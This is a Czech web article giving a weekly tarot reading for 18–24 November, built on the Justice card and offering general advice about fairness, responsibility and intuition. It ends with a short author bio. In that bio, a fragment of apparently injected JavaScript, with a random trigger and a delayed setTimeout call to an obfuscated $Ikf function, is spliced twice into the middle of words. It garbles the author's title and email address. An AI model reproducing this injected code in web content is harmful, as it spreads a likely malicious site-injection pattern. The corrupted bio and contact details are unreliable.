Ezoterika, Magie,  Tarot

Týdenní čtení z tarotových karet: 18. – 24. listopadu 201

Karta týdne: Spravedlnost

Pokud jste letos již od začátku jednali v souladu se svým Vyšším Já a pro dobro druhých i své vlastní, nemusíte se v průběhu tohoto týdne ničeho bát. Pustili jste se však v předchozích týdnech do něčeho, za co byste měli teď převzít zodpovědnost, budete k ní s velkou pravděpodobností vyzváni.
Karta Spravedlnost ukazuje, že budete mít pro sebe i pro druhé dostatek porozumění a soucitu. Jestli jste udělali něco, na co byste raději zapomněli, anebo to chtěli vzít zpátky, tato karta naznačuje, že bez ohledu na to, o co šlo, budou s vámi ostatní zacházet spravedlivě a bez zaujatosti.
Usilujete-li vy sami v nějaké záležitosti o spravedlnost, pak je karta tohoto týdne pozitivním znamením, že vám bude učiněno zadost. Čeká-li vás jakékoli úřední, soudní řízení nebo čekáte na konečné rozhodnutí v určité věci, brzo se dozvíte výsledek. Jakmile k rozhodnutí dojde, ať již bude takové nebo makové, měli byste ho přijmout a jít dál. Pokud jste v něčem pochybili, byť by šlo pouze o zanedbání ve vedení účetnictví nebo administrativě, karta Spravedlnost nedává žádné druhé šance.
Pravděpodobně bude nutno koncem týdne vykonat volbu, která se ukáže být důležitá i z dlouhodobého hlediska. Proto byste měli pečlivě a předem zvážit dopad svých rozhodnutí, zejména na vaši pohodu a pohodu vašich blízkých. Spolehněte se na svůj „vnitřní naváděcí systém“, svou intuici a požádejte o odpověď, která bude nejlepší ze všech a pro všechny.
Budete se muset ptát sami sebe: „Stojím za svými rozhodnutími a přijímám důsledky svých činů?“ Rozvažujte u každého svého kroku, co je skutečně správné a co nikoli, a zůstávejte ve své integritě a síle.
Když prozkoumáte tento týden svou vlastní pravdu, zjistíte, že věci nejsou tak jasné, jak jste si původně mysleli. Pravd je tolik, kolik je lidí a každý má tu svou. Buďte připraveni ponořit se do „kalných vod“ a prozkoumat, co pro vás pravda znamená, co je z vyššího, nejenom vašeho hlediska spravedlivé a etické.
Možná se budete cítit trochu unavení, „zabředlí“ v povinnostech všedních dní. Vyzkoušíte několik různých přístupů a zpočátku se bude zdát, že nic nefunguje. Ale Spravedlnost věští, že vaše mentální jasnost nakonec zvítězí. Vaše vnímání bude najednou čisté jako sluneční den, a vy snadno najdete nejefektivnější cestu z čehokoli, co bude pro vás podstatné.
Věřte tento týden svým instinktům. S akcemi směřujícími k uspokojení vašich potřeb čekejte na nejvhodnější okamžik, nepospíchejte s nimi.

Výzva Spravedlnosti na tento týden:
Octnete-li se v prekérní situaci, kdy bude zapotřebí vybrat si z dvou cest, dvou možností, nebo dokonce ze dvou přátel, nedejte se zatlačit do kouta a trvejte na tom, že se do takovéhoto způsobu řešení situací nenecháte vtáhnout. Stavte na svou přirozenou schopnost vymanit se ze z komplikací a uklidnit někdy chaotické emoce. Sdělujte fakta a nápady objektivně.
Karta Spravedlnost vyžaduje, abyste byli celý týden velice opatrní. Hledejte diplomatická a smířlivá řešení.

Judita Katona Peschlová, zkušená kartářka, psychoterapeutka, terapeutka andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andělské terapie a lektorka rodinných konstelací, žurnalistka a spisovatelka; www.angelcity.cz, judita.andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andele@gmail.com